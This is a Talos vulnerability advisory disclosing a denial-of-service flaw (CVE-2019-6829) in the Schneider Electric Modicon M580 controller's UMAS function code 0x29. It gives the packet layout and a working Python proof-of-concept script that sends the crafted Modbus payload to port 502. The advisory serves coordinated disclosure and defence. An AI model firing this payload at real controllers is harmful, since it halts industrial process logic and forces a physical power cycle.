Talos Vulnerability Report

TALOS-2019-0807

Schneider Electric Modicon M580 UMAS Function Code 0x29 Denial of Service Vulnerability

August 13, 2019
CVE Number

CVE-2019-6829

Summary

An exploitable denial of service vulnerability exists in the UMAS function code 0x29 functionality of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

Tested Versions

Schneider Electric Modicon M580 BMEP582040 SV2.70

Product URLs

https://www.schneider-electric.com/en/work/campaign/m580-epac/

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-248: Uncaught Exception

Details

The Modicon M580 is the latest in Schneider Electric's Modicon line of Programmable Automation Controllers. The device boasts a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus, and a management protocol referred to as UMAS.

When a UMAS command is sent using function code 0x29 it is possible to make the device enter a non-recoverable fault state, causing a denial of service condition.

The structure of a malicious function code 0x29 command takes a form similar to the following:

    0   1   2   3   4   5   6   7   8   9   a   b   c   d   e   f
  +---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
0 | A | B | C |                         D                            
  +---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
1   <D cont.> |
  +---+---+---+

A --> Modbus Function Code  (0x5a)
B --> Session
C --> UMAS Function Code    (0x29)
D --> Data                  

In the non-recoverable fault state the CPU has entered an error mode where all remote communications have been stopped, process logic stops execution, and the device requires a physical power cycle to regain functionality.

Exploit Proof of Concept

import socket

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    rhost = "192.168.10.1"
    rport = 502
    s.connect((rhost, rport))
    msg = "000000000014005a00290000ffff010000000000000000000000".decode('hex')
    s.send(msg)
    s.close()

if __name__ == '__main__':
    main()

Timeline

2019-04-10 - Vendor Disclosure
2019-08-13 - Vendor Patched; Public Release

Credit

Discovered by Jared Rittle of Cisco Talos.